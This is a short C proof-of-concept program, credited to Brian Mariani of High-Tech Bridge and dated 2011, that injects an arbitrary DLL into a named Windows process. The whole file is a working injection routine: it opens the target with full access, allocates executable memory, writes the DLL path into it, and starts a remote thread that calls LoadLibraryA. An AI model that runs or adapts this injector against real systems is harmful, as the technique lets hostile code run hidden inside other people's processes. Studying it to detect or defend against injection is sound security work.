//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// Proof of concept                  //
// by Brian Mariani High-Tech Bridge //
// www.htbridge.ch                   //
// 01.09.2011                        //
// Compiled with Dev-CPP 4.9.9.2     //
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>

int Inject_DLL(long pidProcAInjecter , char* dll_to_inject);
long ProcessToPid(char* process);

int Inject_DLL(long pidProcAInjecter , char* dll_to_inject)
{
    long dll_size = strlen(dll_to_inject) + 1;

    printf("-> Opening the target process...\n");

    HANDLE MyHandle = OpenProcess(PROCESS_ALL_ACCESS , FALSE , pidProcAInjecter);
    if(MyHandle == NULL)return 0;

    printf("-> Memory Allocation...\n");
    LPVOID MyAlloc = VirtualAllocEx( MyHandle , NULL , dll_size , MEM_COMMIT , PAGE_EXECUTE_READWRITE);
    if(MyAlloc == NULL)
        return 0;

    printf("-> Writing DLL in memory...\n");
    int IsWriteOK = WriteProcessMemory( MyHandle , MyAlloc , dll_to_inject , dll_size , 0);
    if(IsWriteOK  == 0)
        return 0;

    printf("-> Creating the Thread...\n");
    DWORD identificateurThread ;
    LPTHREAD_START_ROUTINE addrLoadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32"),"LoadLibraryA");
    HANDLE ThreadReturn= CreateRemoteThread( MyHandle , NULL , 0 , addrLoadLibrary , MyAlloc , 0 , &identificateurThread );
    if(ThreadReturn == NULL)
        return 0;
        
    if ((MyHandle != NULL) && (MyAlloc != NULL) && (IsWriteOK != ERROR_INVALID_HANDLE) && (ThreadReturn != NULL))
    { printf("-> DLL injected :]\n");
    } 
     
    return 1;
}

long ProcessToPid(char* process)
{
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 structprocsnapshot = {0};

    structprocsnapshot.dwSize = sizeof(PROCESSENTRY32);

    if(snapshot == INVALID_HANDLE_VALUE)return 0;
    if(Process32First(snapshot,&structprocsnapshot) == FALSE)return 0;

    while(Process32Next(snapshot,&structprocsnapshot) )
    {
       if(!strcmp(structprocsnapshot.szExeFile,process))
       {
            CloseHandle(snapshot);
            printf("Pid is -> %d\n",structprocsnapshot.th32ProcessID);
            return structprocsnapshot.th32ProcessID;
       }
    }
    CloseHandle(snapshot);
    return 0;
}

int main(int argc , char* argv[])
{
    Inject_DLL(ProcessToPid(argv[1]),argv[2]);
}